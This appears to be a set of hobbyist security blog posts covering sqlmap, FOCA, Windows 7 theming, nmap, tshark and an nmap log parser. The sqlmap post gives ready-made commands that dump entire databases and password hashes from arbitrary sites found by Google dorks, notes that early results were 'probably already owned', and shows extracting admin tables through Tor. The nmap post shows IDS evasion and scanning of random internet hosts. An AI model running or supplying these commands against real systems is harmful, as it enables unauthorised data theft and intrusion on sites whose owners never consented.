SQLMap - Basic / Intermediate usage

So I've recently been interested in web security a bit more and while learning more about SQL injections I came across a tool I found handy. This is sqlmap, an SQL Injection and Database takeover tool. Sqlmap can handle a variety of database management systems such as MS SQL, MYSQL, Oracle and so on. It supports five injection techniques - boolean-based blind, time-based blind, error-based, UNION query and stacked queries. It can retrieve tables, along with its contents. It also has a built in hash cracking function to attempt to crack known hash's with a dictionary based attack. It has many other fun features such as metasploit interaction for privilege escalation and utilization of google dorks, which I will give an example of below.

This command with use a given google dork and attempt to dump all available information from all the results on the first page of google. 

python sqlmap.py --dump-all -g "inurl:prodID=3030"

Now this could come in handy when pentesting because you could use google dorks to focus in on the target and spider it for specific pages or just more possible vulnerabilities. Or just  use it for the general dork fun. You can also choose a different page for the google results as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an sql injection is found we can will add the following beep command.

python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep

Another possibility when targeting a specific target in a pentest you can do something like this;


python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify certain things to extract to save time which I'm sure you'll see. To start off we will fingerprint the system to get an idea of what we're dealing with. Than we will find the databases and tables with verbosity and proceed to issue another command to extract the current user and password hash's.

python sqlmap.py -u www.example.com/shop/prodID=777 -f

If all's we'll proceed to issue the following commands, this will automate the process (--batch) and show us the estimated time (--eta); 

python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta

Now we know the example DBase have a table named ex_admin, so we'll pull that tables columns.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump -batch --eta

If we wanted to do this via a proxy, you can use the --proxy flag as I will show you. We'll assume you've got tor and polipo up and running.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123

You can also brute force common tables and column with the --common-tables feature abd play around with the OS Takeover portion of it with --os-pwn (which utilizes metasploit) and --os-shell.


There's alot more this tool can do so check out the following site to learn more - http://sqlmap.sourceforge.net/doc/README.html#ss1.2

You may also find this sql "cheat sheet" useful - http://sql-tutorial.net/SQL-Cheat-Sheet.pdf

FOCA - Extracting metadata from documents.

I was watching random defcon lectures and came across one that interested me which was about FOCA. FOCA can be used to extract metadata from within documents and jpgs. Now you may be asking, "what is metadata?", and in crude terms you could think of it as "data within data" or "data about data". Using FOCA you can extract information ranging from the OS and User that created it to the type of device used and its GPS at the time it was taken. You can also use it to spider websites in search of files, as well as using it to assist you in "google hacking" (I.E. using google dorks to find specific information or files). Could be a good assistance in a pentest or something of the sort.

Below you can find a link to where you can download FOCA as well as the lecture that sparked my interest in the first place.


http://www.informatica64.com/DownloadFOCA/

There's also this a website that you can use to extract the metadata from a document on the fly.

Here's the lecture that caught my interest in the first place. It's presented by the developers at defcon and goes into detail about what this tool can do and how to use it. 

Changing themes in Windows 7 Starter / Personalizing Win7

Well I recently bought a new netbook and like so many others I got one with Windows 7 Starter not knowing it was crippled, though I had planned to put linux on it to dual boot for whatever OS was needed for the particular task. I was kind of disappointed that I couldn't change the theme to anything besides the default and the older themes. Then I came across one solution which was the "Stardock" theme manager. It comes with a few free themes and I actually like the default one so that works for me. There's also a dock you can use to help personalize the OS, but I've only got 1G of RAM so I don't have the memory to waste on one. So on that note I'll show you what mine looks like as of now, haven't really done much personalizing myself. Just wanted something other than the default themes and that damn background. 

You can download this theme manager from the the following URL;

http://www.stardock.com/products/mycolors/gallery.asp?p=thinkgreen&c=free

There's also fences which I enjoy, they're nice and don't consume much memory. 

You can find more information on fences here http://www.stardock.com/products/fences/

Digging deeper with Nmap

Okay everyone knows the basic nmap usage such as treating all hosts online with the "-PN" command, or probing ports to determine the services/versions are with the "-sV" command but I wanted to talk about alittle bit more than that. 


Here we will spoof our mac while scanning an intruder connected to our network  in order to determine what services they're running, then log in XML format for further analyzing while only displaying the open ports.


nmap 192.168.1.100 -sV --spoof-mac Cisco -oX nlog --open


We can also play with the nmap scripts that come packaged with the tool, these are excellent and if you haven't used them before than you're missing out. We will use the discovery scripts to obtain more information.


nmap 192.168.1.100 -sV --spoof-mac Cisco -oX nlog --open --script=discovery


We could also increase the intensity of the service detection (-sV) with "--version-all". This would try every probe that's available. We may also want to enable OS detection by issuing the "-O" option. We could also just use the "-A" command to enable OS and service detection, traceroute and default script scanning. Keep in mind doing this would make for a noisy and potentially detectable scan. I


In addition to the discovery scripts we could use other script categories such as the "intrusive" or "auth" categories which you can read more about here - http://nmap.org/book/nse-usage.html

We can also do things to increase anonymity and evade Intrusion Detection Systems (IDS) such as using the SYN stealth scan, adding random data to the packets sent and fragmenting them, we will also use the "-iR" command to scan random IP's.

nmap -iR 100 -sS --spoof-mac Cisco --data-length 9 -f


That's where I'll end this little "tutorial", hope someone finds this useful.

Basic Tshark Capture Filters

Well I've been playing around with Tshark so I decided I should make a quick post on using basic filters because it's a great feature and really makes Tshark worth using. For those who don't know what Tshark is, it's the terminal based version of Wireshark.


Getting down to it, if we want to only monitor activity on a certain port, IRC for example, we would issue the following command.


tshark -f "tcp port 6667" -i eth0


If we wanted to log the packets we could do this;


tshark -f "tcp port 6667" -w /home/tlog -i eth0


This would log the packets but it wouldn't allow us to see the packets in real time, so to override that we can add a "-S". You can also just use -f "port 6667" if you want both UDP and TCP packets. You can also increase the information that's displayed by increasing the verbosity with "-V"


tshark -f "port 6667" -w /home/tlog -S -V -i eth0


If perhaps we were looking to filter out specific websites we could use the following;


tshark -f "src www.hakhub.blogspot.com" -w /home/tlog -S -V -i eth0


You could also specify a port like this;


tshark -f "src www.hakhub.blogspot.com and port 80" -w /home/tlog -S -V -i eth0


And this is where I'll end this example of the tshark capture filter usage, there's also a read filter which you can find more information about here - http://www.wireshark.org/docs/man-pages/wireshark-filter.html

Nmap Log Parser - Creates an IP list from a log

Well I've made this quick log parser in Java for use with Nmap logs and grabbing the IP's to be written to another file in a list format for use with other tools. Below you can find both the source and the jar.

Source - http://pastebin.com/M5pLbQ2C
Jar - http://www.mediafire.com/?bp86q62t3pdrvd3